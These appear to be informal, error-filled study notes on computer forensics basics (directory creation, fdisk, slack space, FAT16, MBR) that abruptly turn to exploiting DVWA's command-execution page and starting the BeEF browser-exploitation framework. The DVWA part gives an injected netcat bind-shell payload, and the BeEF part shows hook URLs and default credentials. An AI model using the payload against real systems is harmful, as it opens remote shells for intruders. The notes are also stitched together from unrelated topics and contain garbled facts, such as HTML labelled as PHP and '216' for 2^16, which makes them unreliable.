solve problems with Computer Forensics

dowload the first data to be in the analysis,,

mkdir ~/evid
used to create a directory with the command
mkdir /mnt/analysis
used to create a folder diadalam directory that will be used to accommodate data...


fdisk -l /dev/hdc
command is used to determine struktir disk, in this case is used to view the structure ofthe file to be in forensics.

Structur file php

Struktur Dasar

<HTML>
<HEAD>
………………………………
</HEAD>
<BODY>
…………………………………
</BODY>
</HTML>
example:Use a text editor (notepad), enter the code below:
<HTML>
<HEAD>
<TITLE> Web Sederhana </TITLE>
</HEAD>
<BODY>


</BODY>
</HTML>
Keep the name coba.htm, in the save as type change to all files. Once saved, openInternet Explorer, click File> Open> browse (search coba.htm file) 

slack space , unallocated space, magic number

slack space

 is refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.

Slack space or sometimes referred to as file slack is the area between the end of a fileand end of the last cluster or sector used by the file in question. Area is an area that will not be used again to store the information there, so the area is "wasted" useless. Slackspace is common in file systems that use a large cluster size, while the file system that uses a small cluster size can organize the storage media more effectively and efficiently.

file system structure Fat 16, Fat 32 EXT2 and EXT3

FAT 16

FAT16

 is a file system that uses the allocation unit that has a limit of up to 16-bit, so it can store up to 216 units of allocation (65536 pieces). This file system has a capacity limit of up to 4 Gigabyte sizes only. Allocation unit size used by the FAT16 partitiondepends on the capacity that was about to be formatted: if the partition size is less than 16 megabytes, then Windows will use the FAT12 file system, and if the partition sizelarger than 16 megabytes, then Windows will use the FAT16 file system. The following table contains information any operating system that supports the FAT16 file system. 

MASTER BOOT RECORD,,

MBR is: a very important data structure that contains the partition table and a number ofexecutable code for the boot start (way to hard to make loading the operating system).
functions to store information about the operating system and then be read by the BIOS.

exploits dvwa level security medium

beginning to make a medium security exploits to dvwa,,,

and then enter into dvwa by selecting commmand execotion,,,
| nc -l -p 4444 -e '/bin/bash'

attack vector browser exploit and metasploits

first before getting to the source and then open the beef,,,

USER/PASSWORD: beef/beef


[ 2:04:00][*] Version: 0.4.2.8-alpha - Run 'svn update' to update to the latest version.
[ 2:04:01][*] Resetting the database for BeEF.
[ 2:04:04][*] BeEF is loading. Wait a few seconds...
[ 2:04:07][*] 6 extensions loaded:
[ 2:04:07]    |   demonstrations
[ 2:04:07]    |   initialization
[ 2:04:07]    |   events logger
[ 2:04:07]    |   console
[ 2:04:07]    |   proxy
[ 2:04:07]    |_  administration web UI
[ 2:04:07][*] 32 modules loaded.
[ 2:04:07][*] 2 network interfaces were detected.
[ 2:04:07][+] running on network interface: 127.0.1.1
[ 2:04:07]    |   Hook URL: http://127.0.1.1:3000/hook.js
[ 2:04:07]    |_  UI URL:   http://127.0.1.1:3000/ui/panel
[ 2:04:07][+] running on network interface: 127.0.0.1
[ 2:04:07]    |   Hook URL: http://127.0.0.1:3000/hook.js
[ 2:04:07]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[ 2:04:07][+] HTTP Proxy: http://127.0.0.1:6789

then be entered into...

then enter a user name and password,,,